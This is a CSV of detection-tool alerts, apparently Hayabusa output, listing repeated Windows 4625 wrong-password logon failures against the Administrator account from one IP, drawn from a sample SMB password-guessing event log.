2016-09-20 01:52:28.225 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: p5qJRSpjS6tZJjNQ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:28.268 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: bo4HAgP2tw0GmZ4o  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:28.308 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Zv0cbLCD7E05i0g5  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:28.349 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: FIKsQLk5iPyKoeqM  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:28.394 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: RiHAaBszJBGe2deQ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:28.442 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: F8em4eOiqze683Cj  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:28.481 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 86lXQsnn7dae93tW  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:28.524 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Iu8olNGPmhxh6iNu  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:28.564 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: qZYtN5EMHxcNqID6  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:28.610 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: mtUQGxrMoPkpUQCS  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:28.712 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: QYh4e3bpePhDoRwr  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:28.760 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: UkC8E9uKpCgD1BHY  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:28.814 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 5ZCDxpmDZbpGCey3  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:28.848 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: SS2dxS3WvCrAyiB2  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:28.897 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: YT3VHxKNf8q14rro  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:28.940 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: fx9HQT3u3Ig6vJ3t  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:28.989 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: FukPQsr4SXRshyTn  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:29.037 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 7AutKUyPELNRUcA4  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:29.081 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 38gBkWcYdZW6Wcdz  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:29.121 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: HMKnLRQCDn1CHZdH  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:29.165 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ShGnRYHfVSuPvfcX  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:29.221 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: LXVWG3Yl0utv98Zf  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:29.268 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: VDfa0UebgleQMK5U  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:29.321 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: BxTLJJsWs9dOc5JC  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:29.372 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: x7cKtymmsQJSM6zZ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:29.420 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: sbtC0srNyvkIHOSV  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:29.452 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: wPGlJ6ZjGSfUKrCf  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:29.491 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 8Uw95Ema8vWlRXKy  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:29.532 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: hHTrBmhkjGLTNt2R  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:29.574 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: XJeRVGKULJIo76aa  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:29.622 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Kipf0Z2Tse2eWoxa  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:29.672 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: bnP7tmMJXDVzIDim  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:29.777 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: CBeMt62oqlIICShT  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:29.868 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: dIfXRZQkKRJAw4er  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:29.933 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 8wrqSJPALo5QtUnS  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:29.981 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 81Mm67AdwpPJMCMm  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:30.035 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Jwq5jXlMRU1SNLO5  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:30.076 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: d7OYj8ynCEl5dG9m  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:30.127 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: YzT8vF7ANYnjSRgd  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:30.164 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: m4eYIoww4uL6oYZu  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:30.199 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: DpO8L2Fky4zYwp2q  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:30.244 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: jGmxSy48sphENTiY  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:30.285 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: tQVAkjteLFK0hbyE  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:30.330 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: UMWKsQ8l0j9fZPfA  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:30.381 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 2ct7xYUYH9sr7mva  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:30.423 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: GBn0XxaPOZQokJ0Z  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:30.463 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: nQELRxrGuXqkYgO3  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:30.509 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 5eT0mykgLNZQygq9  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:30.557 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: qMyIqRidF6oBdzog  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:30.596 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ULnnFcF98k9zpNTl  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:30.648 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: j5k02pcelZNGwF3u  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:30.693 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: qfcC6LqJqs0EeGjE  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:30.733 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: mXALYkkitmyAFq14  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:30.780 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: zIqQmExq22WrW4md  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:30.825 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ydHqjdZhLMI9gjfj  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:30.865 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: IMSe45VZNPdovPbq  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:30.910 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: hiHlcR6qNGE0P7TK  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:30.950 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: iT3jPdHr89RqPlyd  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:30.985 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 0QFnABeYK39XEntR  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:31.068 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 5plMYSBQi5mKmdlk  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:31.113 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 5TaxWckQUCMgWvCZ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:31.153 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 81xZ7iisEyTABmUm  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:31.187 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: qYiQ2xjMQFQwH2XY  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:31.228 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: eRN8e3yzZzxc2p3A  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:31.275 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: QCa6PN0C7XznvipG  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:31.311 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: hFqjIXbEb7eWUFUi  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:31.357 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: FkrVjLgnJZlIyXpk  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:31.396 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 2r5tyuIYijAXN5be  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:31.442 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: AgjQNe9hQrLIETDn  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:31.484 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: KRNoInpFTsixZDIu  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:31.523 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ladJUS6I0HMIwdef  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:31.556 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 6oW63pJlVtjgn3YY  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:31.600 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: xKNu8b2To2Y1twUr  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
